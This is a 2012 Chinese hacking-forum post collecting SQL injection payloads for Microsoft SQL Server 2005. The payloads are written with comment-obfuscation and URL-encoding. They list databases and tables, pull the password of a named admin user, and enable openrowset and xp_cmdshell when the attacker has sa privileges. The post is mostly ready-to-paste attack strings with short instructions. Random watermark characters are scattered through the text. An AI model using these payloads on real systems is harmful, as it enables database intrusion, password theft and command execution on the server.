找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2199|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
4 `! t4 y9 B' f& p% c2 ?! r

' q. u! Q5 x% h* B/ q8 ?. w- @, Z7 R! \6 K
[Copy to clipboard]CODE:
  u! P+ V5 W8 U! n& ]6 n. L* L/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
! I8 m" y! L/ c7 Q! K2 E- i' }2 I0 G/ y+ u7 u# P/ _4 R
爆表语句,somedb部份是所要列的数据库,红色数字1累加
" R; d" w# [  N! P' p- D9 i8 b: }
; e* e% G8 a& [0 B4 Y, p) l- a( @$ A+ b, [/ J5 r1 A
[Copy to clipboard]CODE:( ]- a% Z! P  S( e: s* y
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--; W7 E. M- r$ X
: X& {1 J- I$ a0 o
爆字段语句,爆表admin里user='icerover'的密码段
0 ?3 X+ L" p( Z8 A* Q4 g( d1 C& C- Z) p6 n) M
; }/ [/ s5 t% z, {
[Copy to clipboard]CODE:
  F* q+ N( d+ c**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--! R3 z8 T2 D- C- F, v  \& Q
6 W6 j7 C5 e# @7 m/ L" f
mssql2005默认没有开xp_cmdshell的,openrowset也不能用1 x) O; p/ B9 _, q: W8 h- h
如果是sa权限,可以这样来开启
( G# H! y; @; s+ t5 f开启openrowset
( S$ U" J9 k/ c: v/ n: B! c$ W# T
! H1 j/ r: Z0 D  y3 g8 R) s' m' m4 S% E
[Copy to clipboard]CODE:
8 U( d1 k8 a7 V- w6 L/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--) a- f# y: Q0 ^4 h: A5 l2 N
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
9 U7 w. T' i# U! h3 P/ [% e: D1 Z( {/ I/ C8 e
开启xp_cmdshell5 u: x6 G1 N% [$ n; M" Z
: b4 v! v4 }! O# l. N& r" D, t
) i, G9 R6 ?2 }0 G" E* Y1 F
[Copy to clipboard]CODE:* ^7 _4 t/ F4 k8 B- ]# P& u& ]
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--( m( V) ^0 b2 o1 t. ~
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--8 j, R% W5 @2 I2 I

: k9 s, l: Q1 x( l9 A& L5 Iok,over~~晚安
1 _+ C' F. z. b& l- j* ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表